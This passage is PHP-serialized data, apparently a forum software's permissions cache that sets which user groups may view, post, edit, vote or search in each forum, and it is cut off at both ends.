:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"1\";}i:12;a:18:{s:3:\"pid\";s:3:\"819\";s:3:\"fid\";s:2:\"64\";s:3:\"gid\";s:2:\"12\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"1\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"1\";s:9:\"cansearch\";s:1:\"1\";}i:13;a:18:{s:3:\"pid\";s:3:\"820\";s:3:\"fid\";s:2:\"64\";s:3:\"gid\";s:2:\"13\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"1\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"1\";s:9:\"cansearch\";s:1:\"1\";}i:15;a:18:{s:3:\"pid\";s:3:\"821\";s:3:\"fid\";s:2:\"64\";s:3:\"gid\";s:2:\"15\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"1\";s:9:\"cansearch\";s:1:\"1\";}i:17;a:18:{s:3:\"pid\";s:3:\"822\";s:3:\"fid\";s:2:\"64\";s:3:\"gid\";s:2:\"17\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"1\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"1\";}i:20;a:18:{s:3:\"pid\";s:3:\"823\";s:3:\"fid\";s:2:\"64\";s:3:\"gid\";s:2:\"20\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"1\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"1\";s:9:\"cansearch\";s:1:\"1\";}}i:9;a:1:{i:5;a:18:{s:3:\"pid\";s:2:\"69\";s:3:\"fid\";s:1:\"9\";s:3:\"gid\";s:1:\"5\";s:7:\"canview\";s:1:\"1\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"1\";}}i:10;a:1:{i:10;a:18:{s:3:\"pid\";s:3:\"809\";s:3:\"fid\";s:2:\"10\";s:3:\"gid\";s:2:\"10\";s:7:\"canview\";s:1:\"1\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"1\";}}i:11;a:1:{i:10;a:18:{s:3:\"pid\";s:3:\"809\";s:3:\"fid\";s:2:\"11\";s:3:\"gid\";s:2:\"10\";s:7:\"canview\";s:1:\"1\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"1\";}}i:12;a:2:{i:5;a:18:{s:3:\"pid\";s:3:\"132\";s:3:\"fid\";s:2:\"12\";s:3:\"gid\";s:1:\"5\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"1\";}i:10;a:18:{s:3:\"pid\";s:3:\"133\";s:3:\"fid\";s:2:\"12\";s:3:\"gid\";s:2:\"10\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";}}i:59;a:2:{i:5;a:18:{s:3:\"pid\";s:3:\"132\";s:3:\"fid\";s:2:\"59\";s:3:\"gid\";s:1:\"5\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"1\";}i:10;a:18:{s:3:\"pid\";s:3:\"219\";s:3:\"fid\";s:2:\"59\";s:3:\"gid\";s:2:\"10\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"1\";}}i:13;a:1:{i:10;a:18:{s:3:\"pid\";s:3:\"809\";s:3:\"fid\";s:2:\"13\";s:3:\"gid\";s:2:\"10\";s:7:\"canview\";s:1:\"1\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"1\";}}i:14;a:1:{i:10;a:18:{s:3:\"pid\";s:3:\"809\";s:3:\"fid\";s:2:\"14\";s:3:\"gid\";s:2:\"10\";s:7:\"canview\";s:1:\"1\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"1\";}}i:46;a:3:{i:1;a:18:{s:3:\"pid\";s:3:\"311\";s:3:\"fid\";s:2:\"46\";s:3:\"gid\";s:1:\"1\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";}i:10;a:18:{s:3:\"pid\";s:3:\"809\";s:3:\"fid\";s:2:\"46\";s:3:\"gid\";s:2:\"10\";s:7:\"canview\";s:1:\"1\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"1\";}i:15;a:18:{s:3:\"pid\";s:3:\"312\";s:3:\"fid\";s:2:\"46\";s:3:\"gid\";s:2:\"15\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"1\";s:9:\"cansearch\";s:1:\"1\";}}i:15;a:2:{i:5;a:18:{s:3:\"pid\";s:3:\"134\";s:3:\"fid\";s:2:\"15\";s:3:\"gid\";s:1:\"5\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"1\";}i:10;a:18:{s:3:\"pid\";s:3:\"135\";s:3:\"fid\";s:2:\"15\";s:3:\"gid\";s:2:\"10\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";}}i:20;a:1:{i:10;a:18:{s:3:\"pid\";s:3:\"809\";s:3:\"fid\";s:2:\"20\";s:3:\"gid\";s:2:\"10\";s:7:\"canview\";s:1:\"1\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"1\";}}i:21;a:1:{i:10;a:18:{s:3:\"pid\";s:3:\"809\";s:3:\"fid\";s:2:\"21\";s:3:\"gid\";s:2:\"10\";s:7:\"canview\";s:1:\"1\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"1\";}}i:16;a:3:{i:5;a:18:{s:3:\"pid\";s:3:\"828\";s:3:\"fid\";s:2:\"16\";s:3:\"gid\";s:1:\"5\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"1\";}i:10;a:18:{s:3:\"pid\";s:3:\"829\";s:3:\"fid\";s:2:\"16\";s:3:\"gid\";s:2:\"10\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";}i:15;a:18:{s:3:\"pid\";s:3:\"830\";s:3:\"fid\";s:2:\"16\";s:3:\"gid\";s:2:\"15\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"1\";s:9:\"cansearch\";s:1:\"1\";}}i:17;a:3:{i:5;a:18:{s:3:\"pid\";s:3:\"753\";s:3:\"fid\";s:2:\"17\";s:3:\"gid\";s:1:\"5\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";}i:10;a:18:{s:3:\"pid\";s:3:\"754\";s:3:\"fid\";s:2:\"17\";s:3:\"gid\";s:2:\"10\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";}i:15;a:18:{s:3:\"pid\";s:3:\"830\";s:3:\"fid\";s:2:\"17\";s:3:\"gid\";s:2:\"15\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"1\";s:9:\"cansearch\";s:1:\"1\";}}i:45;a:11:{i:1;a:18:{s:3:\"pid\";s:3:\"463\";s:3:\"fid\";s:2:\"45\";s:3:\"gid\";s:1:\"1\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";}i:2;a:18:{s:3:\"pid\";s:3:\"464\";s:3:\"fid\";s:2:\"45\";s:3:\"gid\";s:1:\"2\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"1\";s:9:\"cansearch\";s:1:\"1\";}i:5;a:18:{s:3:\"pid\";s:3:\"465\";s:3:\"fid\";s:2:\"45\";s:3:\"gid\";s:1:\"5\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"1\";}i:8;a:18:{s:3:\"pid\";s:3:\"466\";s:3:\"fid\";s:2:\"45\";s:3:\"gid\";s:1:\"8\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"1\";}i:10;a:18:{s:3:\"pid\";s:3:\"467\";s:3:\"fid\";s:2:\"45\";s:3:\"gid\";s:2:\"10\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"1\";}i:12;a:18:{s:3:\"pid\";s:3:\"468\";s:3:\"fid\";s:2:\"45\";s:3:\"gid\";s:2:\"12\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"1\";s:9:\"cansearch\";s:1:\"1\";}i:13;a:18:{s:3:\"pid\";s:3:\"469\";s:3:\"fid\";s:2:\"45\";s:3:\"gid\";s:2:\"13\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"1\";s:9:\"cansearch\";s:1:\"1\";}i:15;a:18:{s:3:\"pid\";s:3:\"470\";s:3:\"fid\";s:2:\"45\";s:3:\"gid\";s:2:\"15\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"1\";s:9:\"cansearch\";s:1:\"1\";}i:17;a:18:{s:3:\"pid\";s:3:\"471\";s:3:\"fid\";s:2:\"45\";s:3:\"gid\";s:2:\"17\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"1\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9: